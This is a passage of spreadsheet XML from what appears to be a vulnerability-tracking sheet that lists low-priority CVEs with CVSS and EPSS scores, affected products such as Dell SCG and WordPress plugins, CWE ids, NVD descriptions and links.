      <c r="M5172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78149</t>
        </is>
      </c>
    </row>
    <row r="5173">
      <c r="A5173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78446</t>
        </is>
      </c>
      <c r="C5173" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5173" s="5" t="inlineStr"/>
      <c r="F5173" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G5173" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5173" s="5" t="inlineStr"/>
      <c r="I5173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5173" s="5" t="inlineStr"/>
      <c r="K5173" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5173" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M5173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t>
        </is>
      </c>
    </row>
    <row r="5174">
      <c r="A5174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78602</t>
        </is>
      </c>
      <c r="C5174" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5174" s="5" t="inlineStr"/>
      <c r="F5174" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5174" s="5" t="inlineStr"/>
      <c r="H5174" s="5" t="inlineStr">
        <is>
          <t>elastic:maps_server</t>
        </is>
      </c>
      <c r="I5174" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5174" s="5" t="inlineStr"/>
      <c r="K5174" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5174" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22) in Elastic Maps Server can lead to information disclosure via Path Traversal (CAPEC-126). An unauthenticated attacker able to reach the service over the network could cause it to return the contents of files outside its intended content directory that are readable by the server process.</t>
        </is>
      </c>
      <c r="M5174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78602</t>
        </is>
      </c>
    </row>
    <row r="5175">
      <c r="A5175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78631</t>
        </is>
      </c>
      <c r="C5175" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5175" s="5" t="inlineStr"/>
      <c r="F5175" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5175" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H5175" s="5" t="inlineStr"/>
      <c r="I5175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5175" s="5" t="inlineStr"/>
      <c r="K5175" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L5175" s="5" t="inlineStr">
        <is>
          <t>The Okta Hyperdrive Agent writes the decoded SAML bearer assertion to a local application log file at the default log level on every successful MFA completion. This insertion of sensitive information into the log file makes a live authentication credential readable by any local user with access to the log file.</t>
        </is>
      </c>
      <c r="M5175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t>
        </is>
      </c>
    </row>
    <row r="5176">
      <c r="A5176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79630</t>
        </is>
      </c>
      <c r="C5176" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5176" s="5" t="inlineStr"/>
      <c r="F5176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5176" s="5" t="inlineStr"/>
      <c r="H5176" s="5" t="inlineStr"/>
      <c r="I5176" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5176" s="5" t="inlineStr"/>
      <c r="K5176" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5176" s="5" t="inlineStr">
        <is>
          <t>The WPFunnels  WordPress plugin before 3.13.0 does not verify that the product requested through a checkout order bump is the product that bump's discount was configured for, allowing unauthenticated users to obtain any purchasable product at a discount intended for a different one, with the reduced price carried through to the total of the order they place.</t>
        </is>
      </c>
      <c r="M5176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79630</t>
        </is>
      </c>
    </row>
    <row r="5177">
      <c r="A5177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79631</t>
        </is>
      </c>
      <c r="C5177" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5177" s="5" t="inlineStr"/>
      <c r="F5177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5177" s="5" t="inlineStr"/>
      <c r="H5177" s="5" t="inlineStr"/>
      <c r="I5177" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5177" s="5" t="inlineStr"/>
      <c r="K5177" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5177" s="5" t="inlineStr">
        <is>
          <t>The WPFunnels  WordPress plugin before 3.13.0 does not restrict access to the log files it writes to a predictable location under the public uploads directory, allowing unauthenticated users to download customer order details and opt-in form submissions when logging is enabled.</t>
        </is>
      </c>
      <c r="M5177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79631</t>
        </is>
      </c>
    </row>
    <row r="5178">
      <c r="A5178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79632</t>
        </is>
      </c>
      <c r="C5178" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5178" s="5" t="inlineStr"/>
      <c r="F5178" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5178" s="5" t="inlineStr"/>
      <c r="H5178" s="5" t="inlineStr"/>
      <c r="I5178" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5178" s="5" t="inlineStr"/>
      <c r="K5178" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5178" s="5" t="inlineStr">
        <is>
          <t>The WPFunnels  WordPress plugin before 3.13.0 does not perform any authorisation or nonce check in one of its opt-in submission handlers, and takes the notification recipients and subject from the request, allowing unauthenticated users to make the site send emails to arbitrary recipients with an arbitrary subject.</t>
        </is>
      </c>
      <c r="M5178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79632</t>
        </is>
      </c>
    </row>
    <row r="5179">
      <c r="A5179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79638</t>
        </is>
      </c>
      <c r="C5179" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5179" s="5" t="inlineStr"/>
      <c r="F5179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5179" s="5" t="inlineStr"/>
      <c r="H5179" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5179" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5179" s="5" t="inlineStr"/>
      <c r="K5179" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L5179" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Alternate XSS Syntax vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="M5179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79638</t>
        </is>
      </c>
    </row>
    <row r="5180">
      <c r="A5180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79741</t>
        </is>
      </c>
      <c r="C5180" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5180" s="5" t="inlineStr"/>
      <c r="F5180" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G5180" s="5" t="inlineStr"/>
      <c r="H5180" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5180" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5180" s="5" t="inlineStr"/>
      <c r="K5180" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L5180"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M5180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79741</t>
        </is>
      </c>
    </row>
    <row r="5181">
      <c r="A5181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79946</t>
        </is>
      </c>
      <c r="C5181" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5181" s="5" t="inlineStr"/>
      <c r="F5181" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5181" s="5" t="inlineStr"/>
      <c r="H5181" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5181" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5181" s="5" t="inlineStr"/>
      <c r="K5181" s="5" t="inlineStr">
        <is>
          <t>CWE-87</t>
        </is>
      </c>
      <c r="L5181" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Alternate XSS Syntax vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="M5181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79946</t>
        </is>
      </c>
    </row>
    <row r="5182">
      <c r="A5182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79952</t>
        </is>
      </c>
      <c r="C5182" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5182" s="5" t="inlineStr"/>
      <c r="F5182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5182" s="5" t="inlineStr"/>
      <c r="H5182" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5182" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5182" s="5" t="inlineStr"/>
      <c r="K5182" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L5182" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Encoding or Escaping of Output vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks.</t>
        </is>
      </c>
      <c r="M5182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79952</t>
        </is>
      </c>
    </row>
    <row r="5183">
      <c r="A5183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79961</t>
        </is>
      </c>
      <c r="C5183" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5183" s="5" t="inlineStr"/>
      <c r="F5183" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5183" s="5" t="inlineStr"/>
      <c r="H5183" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5183" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5183" s="5" t="inlineStr"/>
      <c r="K5183" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L5183"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M5183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79961</t>
        </is>
      </c>
    </row>
    <row r="5184">
      <c r="A5184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79964</t>
        </is>
      </c>
      <c r="C5184" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5184" s="5" t="inlineStr"/>
      <c r="F5184" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5184" s="5" t="inlineStr"/>
      <c r="H5184" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5184" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5184" s="5" t="inlineStr"/>
      <c r="K5184" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="L5184" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Escape, Meta, or Control Sequences vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to launch of phishing attacks.</t>
        </is>
      </c>
      <c r="M5184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79964</t>
        </is>
      </c>
    </row>
    <row r="5185">
      <c r="A5185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79965</t>
        </is>
      </c>
      <c r="C5185" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5185" s="5" t="inlineStr"/>
      <c r="F5185" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5185" s="5" t="inlineStr"/>
      <c r="H5185" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5185" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5185" s="5" t="inlineStr"/>
      <c r="K5185" s="5" t="inlineStr">
        <is>
          <t>CWE-625</t>
        </is>
      </c>
      <c r="L5185" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an External Control of Critical State Data vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M5185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79965</t>
        </is>
      </c>
    </row>
    <row r="5186">
      <c r="A5186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79971</t>
        </is>
      </c>
      <c r="C5186" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5186" s="5" t="inlineStr"/>
      <c r="F5186" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5186" s="5" t="inlineStr"/>
      <c r="H5186" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5186" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5186" s="5" t="inlineStr"/>
      <c r="K5186" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L5186" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Sanitization of Custom Special Characters vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="M5186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79971</t>
        </is>
      </c>
    </row>
    <row r="5187">
      <c r="A5187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80174</t>
        </is>
      </c>
      <c r="C5187" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5187" s="5" t="inlineStr"/>
      <c r="F5187" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5187" s="5" t="inlineStr"/>
      <c r="H5187" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5187" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5187" s="5" t="inlineStr"/>
      <c r="K5187" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L5187" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Session Expiration vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to session theft.</t>
        </is>
      </c>
      <c r="M5187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80174</t>
        </is>
      </c>
    </row>
    <row r="5188">
      <c r="A5188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80339</t>
        </is>
      </c>
      <c r="C5188" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5188" s="5" t="inlineStr"/>
      <c r="F5188" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5188" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5188" s="5" t="inlineStr"/>
      <c r="I5188" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5188" s="5" t="inlineStr"/>
      <c r="K5188" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5188" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for Stripe WooCommerce WordPress plugin before 4.0.12 does not validate the order key before adding order data to the JavaScript configuration it outputs on the front end, allowing unauthenticated users to obtain the billing details of any order, together with the secret that gates access to it, by iterating sequential order identifiers.</t>
        </is>
      </c>
      <c r="M5188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80339</t>
        </is>
      </c>
    </row>
    <row r="5189">
      <c r="A5189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80340</t>
        </is>
      </c>
      <c r="C5189" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5189" s="5" t="inlineStr"/>
      <c r="F5189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5189" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5189" s="5" t="inlineStr"/>
      <c r="I5189" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5189" s="5" t="inlineStr"/>
      <c r="K5189" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5189" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for PayPal WooCommerce WordPress plugin before 2.0.26 does not validate the order key before adding order data to the JavaScript configuration it outputs on the front end, allowing unauthenticated users to obtain the secret that gates access to any order and, through it, that customer's billing and shipping details, by iterating sequential order identifiers.</t>
        </is>
      </c>
      <c r="M5189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80340</t>
        </is>
      </c>
    </row>
    <row r="5190">
      <c r="A5190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81021</t>
        </is>
      </c>
      <c r="C5190" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5190" s="5" t="inlineStr"/>
      <c r="F5190" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5190" s="5" t="inlineStr"/>
      <c r="H5190" s="5" t="inlineStr"/>
      <c r="I5190" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5190" s="5" t="inlineStr"/>
      <c r="K5190" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5190" s="5" t="inlineStr">
        <is>
          <t>The SupportCandy  WordPress plugin before 3.5.3 does not perform an authorization check on one of its support-ticket attachment download paths, allowing unauthenticated attackers to read protected customer-uploaded attachments by enumerating sequential attachment identifiers.</t>
        </is>
      </c>
      <c r="M5190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81021</t>
        </is>
      </c>
    </row>
    <row r="5191">
      <c r="A5191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81022</t>
        </is>
      </c>
      <c r="C5191" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5191" s="5" t="inlineStr"/>
      <c r="F5191" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5191" s="5" t="inlineStr"/>
      <c r="H5191" s="5" t="inlineStr"/>
      <c r="I5191" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5191" s="5" t="inlineStr"/>
      <c r="K5191" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L5191" s="5" t="inlineStr">
        <is>
          <t>The SupportCandy  WordPress plugin before 3.5.3 does not validate a submitted per-ticket authorization code before disclosing the real code to the requester, allowing unauthenticated users to read the contents of any support ticket.</t>
        </is>
      </c>
      <c r="M5191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81022</t>
        </is>
      </c>
    </row>
    <row r="5192">
      <c r="A5192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81162</t>
        </is>
      </c>
      <c r="C5192" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5192" s="5" t="inlineStr"/>
      <c r="F5192" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5192" s="5" t="inlineStr"/>
      <c r="H5192" s="5" t="inlineStr">
        <is>
          <t>dxpr_builder_project:dxpr_builder</t>
        </is>
      </c>
      <c r="I5192" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5192" s="5" t="inlineStr"/>
      <c r="K5192" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="L5192" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in Drupal DXPR Builder: The Best Editing (AI) Experience for Drupal allows Forceful Browsing. This issue affects DXPR Builder: The Best Editing (AI) Experience for Drupal versions: from 0.0.0 to 2.8.1.</t>
        </is>
      </c>
      <c r="M5192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81162</t>
        </is>
      </c>
    </row>
    <row r="5193">
      <c r="A5193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81269</t>
        </is>
      </c>
      <c r="C5193" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5193" s="5" t="inlineStr"/>
      <c r="F5193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5193" s="5" t="inlineStr"/>
      <c r="H5193" s="5" t="inlineStr">
        <is>
          <t>data_field_project:data_field</t>
        </is>
      </c>
      <c r="I5193" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5193" s="5" t="inlineStr"/>
      <c r="K5193" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5193" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Drupal Data field allows Forceful Browsing. This issue affects Data field versions: from 0.0.0 to 2.0.13.</t>
        </is>
      </c>
      <c r="M5193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81269</t>
        </is>
      </c>
    </row>
    <row r="5194">
      <c r="A5194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81380</t>
        </is>
      </c>
      <c r="C5194" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5194" s="5" t="inlineStr"/>
      <c r="F5194" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G5194" s="5" t="inlineStr"/>
      <c r="H5194" s="5" t="inlineStr"/>
      <c r="I5194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5194" s="5" t="inlineStr"/>
      <c r="K5194" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L5194" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M5194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81380</t>
        </is>
      </c>
    </row>
    <row r="5195">
      <c r="A5195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81424</t>
        </is>
      </c>
      <c r="C5195" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5195" s="5" t="inlineStr"/>
